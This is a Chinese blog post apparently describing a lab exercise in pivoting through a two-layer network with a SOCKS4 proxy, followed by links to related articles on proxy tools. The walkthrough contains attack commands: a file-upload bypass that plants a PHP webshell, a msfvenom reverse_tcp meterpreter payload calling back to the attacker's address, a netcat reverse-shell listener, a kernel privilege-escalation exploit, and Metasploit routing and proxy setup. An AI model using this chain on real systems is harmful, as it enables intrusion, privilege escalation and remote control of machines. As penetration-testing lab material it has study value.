socks4代理网络渗透测试实验

最新推荐文章于 2024-03-07 10:00:00 发布
最新推荐文章于 2024-03-07 10:00:00 发布
阅读量2.1k 收藏 1
点赞数 1
分类专栏: 实验测试 文章标签: socks4代理 内网渗透 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/win176489/article/details/92836381
版权 
            实验目的:利用代理功能对2层网络进行渗透
  测试靶机  ubantu 192.168.31.207  192.168.1.129
                  ubantu  192.168.1.100

首先访问192.168.31.207

一个简单得上传界面,这个界面做了文件类型的检测,直接上传是不行的,我们选择一句话木马,然后抓包修改文件类型,将

改为
放包就上传成功了

菜刀连接文件地址

kali打开msf控制台,设置模块exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.31.43
set LPORT 8888
利用msfvenom生成elf木马 msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.31.43 LPORT=8888 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >1.elf
利用菜刀上传php大马,并将生成的elf木马上传到目标机
进入大马进行反弹shell提权
kali本地监听12388端口 nc -lvvp 12388

大马进行反弹shell

反弹成功
uname -a 查看内核版本 并对上传对应的提权脚本进行提权 我用的是3.3.13内核的脚本
gcc shell.c -o shell
./shell
提权成功
我们给上传的elf木马权限并执行
chmod 777 1.elf
./elf
成功获得一个会话连接
添加一个路由 run autoroute -s 192.168.1.0/24

本地设置socks4代理
use auxiliary/server/socks4a
set SRVPORT 9999
开启新的终端 编辑 vim /etc/proxychains.conf
将设置的socks4添加进末尾
代理打开firefox

访问192.168.1.100
弱口令登陆后台,在设置处添加可以上传的文件类型 其他格式添加php,PHP,php3

添加新文章上传php大马
直接拖拽成功上传后,可以查看路径,直接访问地址
由于msf的路由功能不稳定,所以代理得到的会话很不稳定,并且没有重新连接的功能,所以做内网渗透的时候还是尽量使用稳定的代理工具,如regerog+proxifier,regeorg+proxychains等相对稳定工具,当然如果自己有公网ip的话,还可以使用端口转发工具,这里就不赘述了
以上操作仅供大家学习参考使用,

刺 心
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rpivot:socks4反向代理,用于渗透测试
05-01
RPIVOT-反向袜子4渗透测试代理 RPIVOT允许通过套接字4将流量隧道传输到内部网络。它的工作方式类似于ssh动态端口转发,但方向相反。 描述 该工具与Python 2.6-2.7兼容,除了标准库外没有任何依赖项。 它具有客户端-服务器体系结构。 只需在要通过其建立隧道的计算机上运行客户端即可。 服务器应在pentester的计算机上启动,并侦听来自客户端的传入连接。 适用于Kali Linux,Solaris 10,Windows,Mac OS。 用法示例 在端口9999上启动服务器侦听器,从客户端连接后,它将在127.0.0.1:1080上创建socks 4代理: python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080 连接到服务器: p
proxychains:代理链-强制任何给定应用程序建立的任何TCP连接都通过诸如TOR或任何其他SOCKS4,SOCKS5或HTTP(S)代理之类的代理的工具。 支持的身份验证类型:SOCKS45为“ userpass”,HTTP为“ basic”
02-24
ProxyChains版本4.3.0自述文件 ProxyChains是UNIX程序,它通过预加载的DLL将网络相关的libc函数挂接到动态链接的程序中,并通过SOCKS4a / 5或HTTP代理重定向连接。 警告 该程序仅适用于动态链接的程序。 而且代理链和要调用的程序都必须使用相同的动态链接器(即相同的libc) 当前版本的已知限制 当进程派生时,在子级中进行DNS查找,然后在父级中使用ip,则将找不到对应的ip映射,这是因为派生无法写回父级映射表。 IRSSI会显示此行为,因此您必须将解析的IP地址传递给它。 (您可以使用proxyresolv脚本(需要“ dig”)来这样做) 这表示您目前无法将Tors Onion网址用作irssi。 为了解决这个问题,外部数据存储区(文件,管道等)必须管理dns <→ip映射。 当然必须适当锁定。 shm_open,mkstemp是基于文件的
SOCKS
sxbyl的专栏
01-18 1266
SOCKS: A protocol for TCP proxy across firewalls            Ying-Da Lee        Principal Member Technical Staff          NEC Systems Laboratory, CSTC            ylee@syl.dl.nec.comSOCKS was originally
内网安全:代理技术详解
最新发布
m0_59598029的博客
03-07 988
背景:拿下内网的一个主机权限并且上线到MSF/CS上,IP:192.168.x.*使用控制192.168.x.*的Meterpreter启动路由,MSF相当于进入到该网段中开启节点,支持代理来的转发流量攻击机A(外网,军火库)配置代理到MSF上CS代理建立:有手就行在192.168.x.*的会话上开启SOCKS代理在攻击机A上配置代理装置建立通讯的最大意义就是:可以实现攻击机与内网主机的通讯,有了通讯才能横向移动要根据防火墙因地制宜的选择方式。
You must either set a text or a view
s_nshine的博客
04-10 1127
如下图,当response.getErrmsg()返回null时可能会报此错误。
Just a test, please ignore.
weixin_30449453的博客
09-28 81
This page is produced by a program. It is used for testing WCF. Please ignore. 转载于:https://www.cnblogs.com/smart-code/archive/2012/09/28/2706600.html
mac log4j ERROR Unable to create file
孙玉杰的博客
08-17 756
注释掉/home 配置。
“curl: (7) Failed to receive SOCKS4 connect request ack.”解决方法
MacwinWin的博客
02-05 3310
如果出现: >>> proxychains4 curl twitter.com [proxychains] config file found: /etc/proxychains.conf [proxychains] preloading /usr/local/lib/libproxychains4.so [proxychains] DLL init: proxychains-n...
Failed to receive SOCKS4 connect request ack. 解决方法
热门推荐
An introvert extrovert 的博客
09-22 1万+
转载自:http://www.chenlongyu.com/article/id/35 在此记录主要方便自己查看。 事件背景:开了socket5网络代理,git clone返回上述错误。 关了ss客户端后仍然不行: fatal: unable to access 'https://github.com/whqee/whqee.github.git/': Failed to connect...
解决 class file has wrong version 49.0, should be 48.0 的方法
yangkewei111的专栏
09-19 9691
  有些时间,我们会遇到版本不匹配的问题。如: bad class file: /usr/java/jdk1.5.0_06/jre/lib/rt.jar(java/lang/Object.class)class file
linux centos7 yum安装 proxychains 全局socks代理工具
whatday的专栏
01-06 2065
2.yum安装proxychains。3.配置proxychains代理
Ubuntu下命令行加速、终端加速、命令行代理的方法/proxychains安装与使用
lyh458的博客
06-08 4422
Ubuntu下命令行加速/终端加速的方法 前提:已经安装并配置好加速工具。 实现方法:通过安装配置proxychains4实现,即将任何程序和加速工具的proxy建立连接,原理和浏览器的代理相似。 安装 sudo apt update sudo apt install proxychains4` 配置 sudo vim /etc/proxychains4.conf 注释掉socks4 127.0.0.1那一行,在最后加加速工具的设置,如: socks5 127.0.0.1 1080 使用方法 加
http socks4代理服务器源码-易语言
06-12
基于 hp-socket 开发的代理服务器, 多...经局域网和远程外网测试SOCKS4 代理很稳定,HTTP代理的 HTTPS连接稳定,HTTP连接不稳定,多次访问会出现访问错误的问题 (本地和局域网测试不出来可能是存储访问数据的问题吧)
易语言-易语言http socks4 socks5 超级代理服务端
06-26
基于 hp-socket 开发的代理服务器, 多连接,速度非常的快可基于一个端口开放 HTTP 和 SOCKS4 和 SOCKS5 的代理协议 支持 HTTPS 连接HTTP 和 SOCKS4 比较简单 只是单纯的转发这次增加了 SOCKS5 协议SOCKS5 协议支持...
使用EW作Socks5代理进行内网渗透1
08-03
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
kali内置超好用的代理工具proxychains
Eason_LYC安全白帽子的成长博客
03-21 8531
Kali Linux是一个流行的安全测试渗透测试操作系统,而ProxyChains是其中一个非常有用的工具,它可以帮助用户在渗透测试期间隐藏其真实IP地址,以便更好地保护他们的匿名性和隐私。具体来说,ProxyChains是一个开源工具,它允许用户通过一个或多个代理服务器来路由TCP或UDP连接,从而隐藏其真实IP地址。该工具可以用于在不被发现的情况下执行各种网络操作,例如扫描和攻击,而无需揭示用户的位置和身份。
SOCKS4: A protocol for TCP proxy across firewalls
vptr_grid的专栏
07-25 2424
SOCKS: A protocol for TCP proxy across firewalls Ying-Da Lee Principal Member Technical Staff NEC Systems Laboratory, CSTC ylee@syl.dl.nec.comSOCKS was originally developed by D
SOCKS:通过防火墙的TCP代理协议[SOCKS4]
Winter Liang's Space
11-24 2475
Author: Ying-DaLee PrincipalMember Technical Staff NEC Systems Laboratory, CSTC ylee@syl.dl.nec.com ======================== Translator: Stephen Liang stephen_liang@163.com ==============
frp socks5代理 内网渗透
10-18
frp是一款高性能的反向代理工具,可以将内网服务映射到公网上,从而实现内网穿透。而socks5代理是一种网络协议,可以实现TCP、UDP等协议的代理转发。结合使用frp和socks5代理,可以实现内网渗透的目的。 具体实现方法如下: 1. 在公网服务器上安装frp,并配置好反向代理规则。 2.*** 在攻击机上使用socks5代理客户端连接内网机器的socks5代理服务,即可访问内网服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值